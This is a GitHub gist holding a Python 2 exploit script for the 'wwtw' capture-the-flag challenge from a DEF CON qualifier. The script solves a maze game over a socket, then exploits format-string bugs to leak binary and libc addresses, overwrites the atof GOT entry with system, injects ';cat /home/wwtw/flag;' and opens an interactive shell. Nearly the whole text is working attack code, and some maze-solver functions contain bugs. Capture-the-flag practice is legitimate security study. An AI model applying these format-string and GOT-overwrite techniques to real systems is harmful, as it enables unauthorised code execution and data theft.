-
-
Save peternguyen93/f06aa5e27626598a1c21 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import time | |
| import re | |
| from Pwning import * | |
| pl = Payload() | |
| def get_socket(host, port): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((host, port)) | |
| return s | |
| def send(s, msg): | |
| s.sendall(msg + "\n") | |
| print '[+] Send:', repr(msg) | |
| def recv(s): | |
| data = s.recv(4096) | |
| print data | |
| return data | |
| def recv_until(s, text): | |
| data = '' | |
| while text not in data: | |
| new_data = recv(s) | |
| if new_data == '': | |
| break | |
| data += new_data | |
| if 'TARDIS KEY:' in data: | |
| return data | |
| import time | |
| time.sleep(0.01) | |
| return data | |
| """ | |
| MAZE GAME | |
| """ | |
| g_map = None | |
| g_found = False | |
| g_path = None | |
| MAP_WIDTH = 20 | |
| MAP_HEIGHT = 20 | |
| TARGET_X = 89 | |
| TARGET_Y = 28 | |
| g_best_solution = 'A' * 1000 | |
| def get_valid_moves(moved_cells, x, y): | |
| moves = [] | |
| if x < MAP_WIDTH - 1 and g_map[y][x + 1] != 'A' and moved_cells[y][x + 1] == False: | |
| moves.append('d') | |
| if y < MAP_HEIGHT - 1 and g_map[y + 1][x] != 'A' and moved_cells[y + 1][x] == False: | |
| moves.append('s') | |
| if y > 0 and g_map[y - 1][x] != 'A' and moved_cells[y - 1][x] == False: | |
| moves.append('w') | |
| if x > 0 and g_map[y][x - 1] != 'A' and moved_cells[y][x - 1] == False: | |
| moves.append('a') | |
| return moves | |
| def solve_rec(moved_cells, x, y, curr_path): | |
| global g_best_solution | |
| if g_found: | |
| return | |
| if len(curr_path) > len(g_best_solution): | |
| return | |
| if g_map[x][y] == 'E': | |
| g_found = True | |
| g_path = curr_path | |
| available_moves = get_valid_moves(moved_cells, x, y) | |
| for move in available_moves: | |
| if move == 'w': | |
| next_x = x | |
| next_y = y - 1 | |
| elif move == 's': | |
| next_x = x | |
| next_y = y + 1 | |
| elif move == 'a': | |
| next_x = x - 1 | |
| next_y = y | |
| else: | |
| next_x = x + 1 | |
| next_y = y | |
| curr_path += move | |
| moved_cells[next_y][next_x] = True | |
| solve_rec(moved_cells, next_x, next_y, curr_path) | |
| moved_cells[next_y][next_x] = False | |
| curr_path = curr_path[:-1] # restore | |
| def get_person_position(): | |
| for i in xrange(MAP_HEIGHT): | |
| for j in xrange(MAP_WIDTH): | |
| if g_map[i][j] in '^<>V': | |
| return (i, j) | |
| def get_target_position(): | |
| for i in xrange(MAP_HEIGHT): | |
| for j in xrange(MAP_WIDTH): | |
| if g_map[i][j] in 'ET': | |
| return (i, j) | |
| def get_moves(r, c): | |
| return [(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)] | |
| def get_best_move(m): | |
| global g_map | |
| g_map = m | |
| person = get_person_position() | |
| target = get_target_position() | |
| print 'person:', person | |
| print 'target:', target | |
| best_score = 0 | |
| best_position_score = -1000000 | |
| best_position = (0, 0) | |
| for p_r, p_c in get_moves(person[0], person[1]): | |
| nearest_enemy = 1000 | |
| for r in xrange(MAP_HEIGHT): | |
| for c in xrange(MAP_WIDTH): | |
| if g_map[r][c] == 'A': | |
| enemy_distance = abs(r - p_r) + abs(c - p_c) | |
| if enemy_distance < nearest_enemy: | |
| nearest_enemy = enemy_distance | |
| target_distance = abs(target[0] - p_r) + abs(target[1] - p_c) | |
| position_score = nearest_enemy - target_distance * 100 | |
| print (p_r, p_c), nearest_enemy, target_distance, position_score | |
| if position_score > best_position_score and nearest_enemy != 0: | |
| best_position_score = position_score | |
| best_position = (p_r, p_c) | |
| if best_position_score == -1000000: | |
| return None | |
| if best_position[0] < person[0]: | |
| return 'w' | |
| if best_position[0] > person[0]: | |
| return 's' | |
| if best_position[1] < person[1]: | |
| return 'a' | |
| return 'd' | |
| def solve(m): | |
| global g_map | |
| g_map = m | |
| moved_cells = [] | |
| for i in xrange(MAP_HEIGHT): | |
| moved_cells.append([]) | |
| for j in xrange(MAP_WIDTH): | |
| moved_cells[i].append(False) | |
| person_position = get_person_position() | |
| solve_rec(moved_cells, person_position[0], person_position[1], '') | |
| return g_path | |
| """ | |
| MAZE GAME | |
| """ | |
| def read_map(raw): | |
| m = [0] * 20 | |
| for i in xrange(20): | |
| row = raw[i][3:] | |
| m[i] = [c for c in row] | |
| return m | |
| def xor_string(a, b): | |
| if len(a) > len(b): | |
| a, b = b, a | |
| ret = '' | |
| for i in xrange(len(a)): | |
| ret += chr( ord(a[i]) ^ ord(b[i]) ) | |
| return ret | |
| def get_key(): | |
| import string | |
| func = '5589E55383EC24E8DCFBFFFF81C33C410000C745F00A0000008D8306E0FFFF890424E8A1F9FFFF8B83F0FFFFFF8B00890424E8A1F9FFFF8D83B8BEFFFF8945F4EB5E8B45F40FB6000FBEC083E07F890424E832FAFFFF85C07442C7442408010000008D45EE89442404C7042400000000E843F9FFFF83F801751E0FB645EE0FBED08B45F40FB6000FBEC083E07F39C27407B801000000EB28836DF0018345F401837DF000759C90E83CF9FFFF8845EF807DEF0A7406807DEFFF75ECB80000000083C4245B5DC35589E55383EC24E816FBFFFF81C3764000008B45148845E4C745F000000000EB66C7442408010000008D45EF894424048B4508890424E8B7F8FFFF8945F4837DF4007F07B8FFFFFFFFEB58837DF4007507B8FFFFFFFFEB4B0FB645EF3A45E475108B55F08B450C01D0C600008B45F0EB328B45F08D50018955F089C28B450C01C20FB645EF88028B45F03B45107C928B45F08D50FF8B450C01D0C600008B45F083E80183C4245B5DC355'.decode('hex') | |
| key = '' | |
| for c in func: | |
| if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789': | |
| key += chr(ord(c) & 0x7f) | |
| if len(key) == 10: | |
| break | |
| return key | |
| def _solve(): | |
| key = get_key() | |
| while True: | |
| s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606) | |
| success = True | |
| while True: | |
| data = recv_until(s, 'Your move (w,a,s,d,q): ') | |
| if 'TARDIS KEY:' in data: | |
| break | |
| raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1] | |
| try: | |
| game_map = read_map(raw_map) | |
| except: | |
| success = False | |
| break | |
| best_move = get_best_move(game_map) | |
| if best_move is None: | |
| success = False | |
| break | |
| send(s, best_move) | |
| if success: | |
| send(s, key) | |
| recv(s) | |
| send(s,'\x00'*9) | |
| recv(s) | |
| time.sleep(2) | |
| send(s,pl.p(0x55592B6C + 1)) | |
| recv(s) | |
| send(s,'\x00'*9) | |
| print repr(recv(s)) | |
| send(s,pl.p(0x55592B6C + 1)) | |
| time.sleep(1) | |
| send(s,'1\n') | |
| recv_until(s, 'The TARDIS console is online!') | |
| recv_until(s, 'Selection:') | |
| send(s,'3\n') | |
| recv_until(s, 'Coordinates: ') | |
| send(s,'51.492137,-0.192878 {}\n'.format('%275$p')) | |
| data = recv_until(s, 'would rip a hole in time and space. Choose again.') | |
| match = re.findall(r'.+ (0x[0-9a-f]*) .+',data) | |
| base_bin = int(match[0],16) - 0x1491 | |
| read = base_bin + 0x5010 | |
| atof_got = base_bin + 0x5080 | |
| print 'Base Bin :',hex(base_bin) | |
| recv_until(s, 'Coordinates: ') | |
| send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s')) | |
| data = recv_until(s, 'would rip a hole in time and space. Choose again.') | |
| print repr(data) | |
| data = data[52:] | |
| read = pl.up(data[4:8]) | |
| printf = pl.up(data[8:12]) | |
| print 'read() : ',hex(read) | |
| print 'printf() : ',hex(printf) | |
| system = read - 0x9aa40 | |
| print 'system() : ',hex(system) | |
| recv_until(s, 'Coordinates: ') | |
| send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 ')) | |
| recv_until(s, 'Coordinates: ') | |
| send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n') | |
| tn = telnetlib.Telnet() | |
| tn.sock = s | |
| tn.interact() | |
| break | |
| _solve() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment